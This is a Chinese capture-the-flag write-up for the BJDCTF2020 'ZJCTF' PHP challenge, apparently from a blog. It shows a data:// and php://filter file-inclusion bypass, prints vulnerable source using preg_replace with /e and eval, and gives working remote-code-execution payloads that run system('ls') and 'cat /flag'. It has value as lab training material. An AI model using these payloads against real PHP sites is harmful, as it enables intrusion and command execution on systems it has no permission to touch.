[BJDCTF2020]ZJCTF,不过如此 1

[BJDCTF2020]ZJCTF,不过如此 1

打开实例发现代码审计

image-20241124093348482

需要GET传入text和file参数,然后执行文件包含

text需要读取到I have a dream文本,这边采用data流进行绕过

?text=data://,I have a dream&file=next.php

image-20241124101339063

成功绕过,接下来进行file文件包含

这边提示读取next.php,访问后无有效数据后,采用php为协议进行读取

?text=data://,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

image-20241124101514036

base64解码后获取到next.php源码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
function getFlag(){
	@eval($_GET['cmd']);
}

image-20241124101624741

再次代码审计

分析后注意到preg_replace()+/e,百度可知preg_replace()+/e存在代码执行漏洞,poc为:?\S*=${ 代码执行位置 }

尝试构建 phpinfo() poc

?\S*=${phpinfo()}

image-20241124104034770

成功显示phpinfo页面

因为上面base64解码后存在php的一个eval代码执行

function getFlag(){
	@eval($_GET['cmd']);
}

采用\S*调用getFlag()函数,然后get请求cmd参数执行任意命令

构建poc

?\S*=${getFlag()}&cmd=system("ls");

image-20241124104846126

未发现flag

ls一下根目录

?\S*=${getFlag()}&cmd=system("ls / -a");

image-20241124105041270

发现flag,读取他它

?\S*=${getFlag()}&cmd=system("cat /flag");

image-20241124105122967

成功获得flag

flag{804d2f52-b857-4cf2-ad25-fe95a67c9470}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

成为别人口中的IT高手

写文章不容易,充充电吧~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值